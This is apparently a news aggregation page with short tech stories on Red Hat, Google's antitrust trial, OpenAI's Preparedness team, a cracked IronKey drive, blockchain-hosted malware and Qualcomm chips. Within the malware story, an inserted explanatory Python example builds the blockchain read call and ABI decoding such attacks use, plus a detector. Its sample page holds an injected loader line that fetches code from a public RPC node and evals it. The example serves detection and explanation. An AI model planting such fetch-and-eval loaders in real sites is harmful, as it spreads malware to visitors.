McGrath offered little consolation to customers who were relying on one-for-one versions of RHEL. They could stay with the downstream distributions, find another provider, or pay for Red Hat. "I think (people) were just so used to the way things work," he said. "There's a vocal group of people that probably need Red Hat's level of support, but simply don't want to pay for it. And I don't really have... there's not much we can tell them."

Since its RHEL decision, Red Hat has secured several prominent partnerships. In September, the cloud-based software company Salesforce moved 200,000 of its systems from the free CentOS Linux to Red Hat Enterprise Linux. The same month, Red Hat announced RHEL would begin to support Oracle's cloud infrastructure. Oracle was one of the few major companies this summer to publicly criticize Red Hat for essentially paywalling its most popular code. On Oct. 24, Red Hat notched another win when the data security firm Cohesity said it would also ditch CentOS Linux for RHEL.

The article delves into the history of Red Hat — and of Linux — before culminating with this quote from McGrath. "I think long gone are the times of that sort of romantic view of hobbyists working in their spare time to build open source. I think there's still room for that — we still have that — but quite a lot of open source is now built from people that are paid full time."

Red Hat likes to point out that 90% of Fortune 500 companies use its services, according to the article. But it also quotes Jonathan Wright, infrastructure team lead at the nonprofit AlmaLinux, as saying that Red Hat played "fast and loose" with the GPL. The newspaper then adds that "For many open source believers, such a threat to its hallowed text isn't forgivable."

Google

Google's 2019 'Code Yellow' Blurred Line Between Search, Ads (bloomberg.com) 25

An anonymous reader shares a report: The former head of search at Alphabet's Google told colleagues in February 2019 that his team was "getting too involved with ads for the good of the product and company," according to emails shown at the Justice Department's landmark antitrust trial against the search giant. Google maintains a firewall between its ads and search teams so that its engineers can innovate on Google's search engine, unsullied by the influence of the team whose goal is to maximize advertising revenue. But in February 2019, testimony at the antitrust trial revealed Tuesday, Google internally declared a "Code Yellow" amid concerns the company might not meet its goals for search revenue for the quarter.

As part of the emergency, which lasted for seven weeks, engineers from Google's search and Chrome browser teams were reassigned to figure out why user queries had slowed, according to the documents. Ben Gomes, Google's former head of search, was called by the company in its defense to show that it had made various advancements in search, particularly in mobile. However, cross examination by Justice Department lawyer David Dahlquist revealed the tensions between Gomes' search team and its advertising counterparts. The questioning sought to undermine Google's contentions that its search team focuses solely on improving the user experience and has sometimes been pulled into the advertising side, where the Justice Department alleges Google has been able to raise prices without pushback.

AI

OpenAI Forms Team To Study 'Catastrophic' AI Risks, Including Nuclear Threats (techcrunch.com) 16

OpenAI today announced that it's created a new team to assess, evaluate and probe AI models to protect against what it describes as "catastrophic risks." From a report: The team, called Preparedness, will be led by Aleksander Madry, the director of MIT's Center for Deployable Machine Learning. (Madry joined OpenAI in May as "head of Preparedness," according to LinkedIn.) Preparedness' chief responsibilities will be tracking, forecasting and protecting against the dangers of future AI systems, ranging from their ability to persuade and fool humans (like in phishing attacks) to their malicious code-generating capabilities.

Some of the risk categories Preparedness is charged with studying seem more... far-fetched than others. For example, in a blog post, OpenAI lists "chemical, biological, radiological and nuclear" threats as areas of top concern where it pertains to AI models. OpenAI CEO Sam Altman is a noted AI doomsayer, often airing fears -- whether for optics or out of personal conviction -- that AI "may lead to human extinction." But telegraphing that OpenAI might actually devote resources to studying scenarios straight out of sci-fi dystopian novels is a step further than this writer expected, frankly.

IT

They Cracked the Code To a Locked USB Drive Worth $235 Million in Bitcoin. Then It Got Weird. (wired.com) 61

Unciphered, a Seattle-based startup, claims to have cracked the seemingly unbreakable encryption of IronKey S200, a decade-old USB thumb drive. By exploiting an undisclosed vulnerability in the device, the company says it can bypass the drive's feature that erases its contents after 10 incorrect password attempts. The breakthrough came within a day of receiving a test device, suggesting that the firm's hacking technique, powered by high-performance computing, could have far-reaching implications.

The startup's focus is not just technological; it's after a specific IronKey that holds 7,002 bitcoins, valued at roughly $235 million, stored in a Swiss bank vault. The device belongs to Stefan Thomas, a Swiss crypto entrepreneur, who has forgotten the password and has only two password attempts left before losing access to his fortune. Unciphered believes its hacking capabilities could unlock Thomas' crypto vault and is preparing to reach out to him to offer its services. The only problem: Thomas doesn't seem to want their help. Wired: Earlier this month, not long after performing their USB-decrypting demonstration for me, Unciphered reached out to Thomas through a mutual associate who could vouch for the company's new IronKey-unlocking abilities and offer assistance. The call didn't even get as far as discussing Unciphered's commission or fee before Thomas politely declined. Thomas had already made a "handshake deal" with two other cracking teams a year earlier, he explained. In an effort to prevent the two teams from competing, he had offered each a portion of the proceeds if either one could unlock the drive. And he remains committed, even a year later, to giving those teams more time to work on the problem before he brings in anyone else -- even though neither of the teams has shown any sign of pulling off the decryption trick that Unciphered has already accomplished.

That has left Unciphered in a strange situation: It holds what is potentially one of the most valuable lockpicking tools in the cryptocurrency world, but with no lock to pick. "We cracked the IronKey," says Nick Fedoroff, Unciphered's director of operations. "Now we have to crack Stefan. This is turning out to be the hardest part." In an email to WIRED, Thomas confirmed that he had turned down Unciphered's offer to unlock his encrypted fortune. "I have already been working with a different set of experts on the recovery so I'm no longer free to negotiate with someone new," Thomas wrote. "It's possible that the current team could decide to subcontract Unciphered if they feel that's the best option. We'll have to wait and see." In past interviews, Thomas has said that his 7,002 bitcoins were left over from a payment he received for making a video titled "What is Bitcoin?" that published on YouTube in early 2011, when a bitcoin was worth less than a dollar. Later that year, he told WIRED that he'd inadvertently erased two backup copies of the wallet that held those thousands of coins, and then lost the piece of paper with the password to decrypt the third copy, stored on the IronKey. By then, his lost coins were worth close to $140,000.

Crime

Scammers Try Hosting Their Malware on a Binance Network (krebsonsecurity.com) 21

Breached web sites distribute malware to visitors by claiming they need to update their browser. But one group of attackers "have developed an ingenious way of keeping their malware from being taken down by security experts or law enforcement," reports security researcher Brian Krebs.

"By hosting the malicious files on a decentralized, anonymous cryptocurrency blockchain." [W]hen Cloudflare blocked those accounts the attackers began storing their malicious files as cryptocurrency transactions in the Binance Smart Chain (BSC), a technology designed to run decentralized apps and "smart contracts," or coded agreements that execute actions automatically when certain conditions are met. Nati Tal, head of security at Guardio Labs, the research unit at Tel Aviv-based security firm Guardio, said the malicious scripts stitched into hacked WordPress sites will create a new smart contract on the BSC Blockchain, starting with a unique, attacker-controlled blockchain address and a set of instructions that defines the contract's functions and structure. When that contract is queried by a compromised website, it will return an obfuscated and malicious payload.

"These contracts offer innovative ways to build applications and processes," Tal wrote along with his Guardio colleague Oleg Zaytsev. "Due to the publicly accessible and unchangeable nature of the blockchain, code can be hosted 'on-chain' without the ability for a takedown." Tal said hosting malicious files on the Binance Smart Chain is ideal for attackers because retrieving the malicious contract is a cost-free operation that was originally designed for the purpose of debugging contract execution issues without any real-world impact. "So you get a free, untracked, and robust way to get your data (the malicious payload) without leaving traces," Tal said.
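The mechanics Tal describes come down to two things: a read-only JSON-RPC `eth_call`, which a node simulates without a transaction (so it costs nothing and is not recorded on the chain), and the ABI decoding the injected client has to do on the returned bytes to get a script it can `eval`. The example below is added here and is not code from the Krebs or Guardio write-ups; the contract address, function selector, payload and sample page are all constructed for illustration, the indicator hostnames are an assumption about what a public BSC RPC call looks like, and the detection heuristic is one the editor wrote, not Guardio's.

```python
"""Added example, not code from the Krebs/Guardio report: the JSON-RPC read that makes
on-chain payload hosting free, the ABI decoding the injected client must do, and a
heuristic for spotting such loaders in page HTML. Contract address, function selector,
payload and sample HTML are all constructed for this illustration."""
import json
import re

# Hypothetical attacker-controlled contract address and getter selector (constructed, not real indicators).
CONTRACT = "0x" + "ab" * 20
SELECTOR = "0x6d4ce63c"
# Constructed stand-in for the obfuscated payload a real contract would return.
PAYLOAD = "/* constructed sample */ document.body.innerHTML = '<h1>Update your browser</h1>';"


def build_eth_call(contract: str, selector: str) -> dict:
    """eth_call only simulates a call on the node: no transaction, no gas, no on-chain record,
    which is why fetching the payload is free and leaves no trace on the chain."""
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def abi_encode_string(s: str) -> str:
    """Encode a single `string` return value as Solidity does: offset word, length word, padded bytes."""
    raw = s.encode()
    padded = raw + b"\x00" * ((32 - len(raw) % 32) % 32)
    return "0x" + (32).to_bytes(32, "big").hex() + len(raw).to_bytes(32, "big").hex() + padded.hex()


def abi_decode_string(hexdata: str) -> str:
    """Decode a single ABI-encoded `string`; the injected client does this with the eth_call result."""
    data = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    offset = int.from_bytes(data[:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    return data[offset + 32:offset + 32 + length].decode()


def simulated_rpc_response(payload: str) -> dict:
    """What a node would answer for the call above if the contract's getter returned `payload`."""
    return {"jsonrpc": "2.0", "id": 1, "result": abi_encode_string(payload)}


# Indicator list (assumption): public BSC JSON-RPC hostnames plus the RPC method name.
RPC_HINTS = ("bsc-dataseed", "binance.org", "eth_call")
ADDR_RE = re.compile(r"0x[0-9a-fA-F]{40}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)


def find_onchain_loaders(html: str) -> list:
    """Flag inline scripts that both talk to a BSC RPC endpoint and name a contract address.
    Either signal alone is common on legitimate dapp pages; the pair inside a non-crypto site is not."""
    findings = []
    for body in SCRIPT_RE.findall(html):
        hints = [h for h in RPC_HINTS if h in body]
        addrs = ADDR_RE.findall(body)
        if hints and addrs:
            findings.append({"contract": addrs[0], "hints": hints})
    return findings


# Constructed sample page: one benign inline script and one injected loader.
SAMPLE_HTML = (
    "<html><body><p>Welcome to the shop.</p>\n"
    "<script>document.title = 'shop';</script>\n"
    "<script>\n"
    "fetch('https://bsc-dataseed.binance.org/', {method: 'POST', body: '"
    + json.dumps(build_eth_call(CONTRACT, SELECTOR))
    + "'}).then(r => r.json()).then(j => eval(decodeAbiString(j.result)));\n"
    "</script></body></html>"
)


if __name__ == "__main__":
    for hit in find_onchain_loaders(SAMPLE_HTML):
        print("on-chain loader found, contract:", hit["contract"], "hints:", hit["hints"])
        # Replay the read the loader would make and recover what the contract hands back.
        resp = simulated_rpc_response(PAYLOAD)
        print("decoded payload:", abi_decode_string(resp["result"]))
```

The point the decoder makes is that nothing about the retrieval is special: any client that can POST JSON to a public node can read the contract's state, so the only takedown levers are the ones BSC describes below (blocklisting the addresses at the endpoints it controls) or blocking the loader on the compromised site itself. Note that the hostname heuristic only catches loaders that name the endpoint in the clear; an attacker who obfuscates the URL or routes through a third-party RPC provider needs a behavioural signal (an `eth_call` whose decoded result is then executed) rather than a string match.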

In response to questions from KrebsOnSecurity, the BNB Smart Chain (BSC) said its team is aware of the malware abusing its blockchain, and is actively addressing the issue. The company said all addresses associated with the spread of the malware have been blacklisted, and that its technicians had developed a model to detect future smart contracts that use similar methods to host malicious scripts. "This model is designed to proactively identify and mitigate potential threats before they can cause harm," BNB Smart Chain wrote. "The team is committed to ongoing monitoring of addresses that are involved in spreading malware scripts on the BSC. To enhance their efforts, the tech team is working on linking identified addresses that spread malicious scripts to centralized KYC [Know Your Customer] information, when possible."

IT

Qualcomm Will Try To Have Its Apple Silicon Moment in PCs With 'Snapdragon X' (arstechnica.com) 32

Qualcomm's annual "Snapdragon Summit" is coming up later this month, and the company appears ready to share more about its long-planned next-generation Arm processor for PCs. ArsTechnica: The company hasn't shared many specifics yet, but yesterday we finally got a name: "Snapdragon X," which is coming in 2024, and it may finally do for Arm-powered Windows PCs what Apple Silicon chips did for Macs a few years ago (though it's coming a bit later than Qualcomm had initially hoped). Qualcomm has been making chips for PCs for years, most recently the Snapdragon 8cx Gen 3 (you might also know it as the Microsoft SQ3, which is what the chip is called in Surface devices). But those chips have never quite been fast enough to challenge Intel's Core or AMD's Ryzen CPUs in mainstream laptops. Any performance deficit is especially noticeable because many people will run at least a few apps designed for the x86 version of Windows, code that needs to be translated on the fly for Arm processors.

So why will Snapdragon X be any different? It's because these will be the first chips born of Qualcomm's acquisition of Nuvia in 2021. Nuvia was founded and staffed by quite a few key personnel from Apple's chipmaking operation, the team that had already upended a small corner of the x86 PC market by designing the Apple M1 and its offshoots. Apple had sued Nuvia co-founder and current Qualcomm engineering SVP Gerard Williams for poaching Apple employees, though the company dropped the suit without comment earlier this year. The most significant change from current Qualcomm chips will be a CPU architecture called Oryon, Qualcomm's first fully custom Arm CPU design since the original Kryo cores back in 2015. All subsequent versions of Kryo, from 2016 to now, have been tweaked versions of off-the-shelf Arm Cortex processors rather than fully custom designs. As we've seen in the M1 and M2, using a custom design with the same Arm instruction set gives chip designers the opportunity to boost performance for everyday workloads while still maintaining impressive power usage and battery life.
